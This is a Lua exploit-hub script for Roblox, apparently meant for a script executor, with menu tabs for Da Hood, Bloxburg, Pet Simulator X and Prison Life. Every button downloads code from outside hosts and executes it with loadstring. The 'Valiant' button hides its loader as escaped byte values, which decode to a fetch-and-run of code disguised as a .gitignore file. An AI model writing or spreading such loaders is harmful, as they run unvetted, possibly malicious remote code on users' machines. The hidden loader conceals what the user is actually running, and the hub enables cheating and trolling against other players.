local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
local Window = Library.CreateLib("AltOfHa | Thanks For Using!", "BloodTheme")
local Tab = Window:NewTab("Dahood")
local Section = Tab:NewSection("Fun")
Section:NewButton("Swag Mode", "Script", function()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/lerkermer/lua-projects/master/SwagModeV002'))()
end)
Section:NewButton("RayCodeX", "Script", function()
    loadstring(game:GetObjects("rbxassetid://5812737894")[1].Source)()
end)
Section:NewButton("Valiant", "Script", function()
    pcall(function()
        if not game:IsLoaded() then
        repeat
        wait()
        until game:IsLoaded()
    end
    if game:IsLoaded() then
        for Valiant=1,1 do
        wait()
        loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\86\97\110\105\115\50\53\50\47\118\97\108\105\97\110\116\47\109\97\105\110\47\46\103\105\116\105\103\110\111\114\101\39\41\44\32\116\114\117\101\41\41\40\41\10")()
        end
    end
    end)
end)
local Tab = Window:NewTab("BloxBurg")
local Section = Tab:NewSection("Epic")
Section:NewButton("AutoBuild/Farm", "Script", function()
    local http_request = http_request or request or (syn and syn.request) or (http and http.request)
loadstring(http_request({Url="https://cdn.applebee1558.com/autoloader.lua", Method="GET"}).Body)()
end)
local Tab = Window:NewTab("Pet Simulator X")
local Section = Tab:NewSection("AutoFarm")
Section:NewButton("Ez Pets", "Script", function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/TurfuGoldy/GoldenScripts/main/EzPets.lua", true))()
end)
Section:NewButton("Uranium Hub", "Script", function()
    loadstring(game:HttpGet("https://uraniumhub.tk/storage/script.lua", true))()
end)
Section:NewButton("SomethingHub (Key)", "Script", function()
    loadstring(game:HttpGetAsync("https://somethinghub.xyz/script.lua", true))()
end)
local Tab = Window:NewTab("Prision Life")
local Section = Tab:NewSection("Troll Scripts")
Section:NewButton("Uranium Hub", "Script", function()
    loadstring(game:HttpGet("https://uraniumhub.tk/storage/script.lua", true))()
end)
Section:NewButton("Nexus Exploits", "Script", function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/GwnStefano/NexusHub/main/Main", true))()
end)
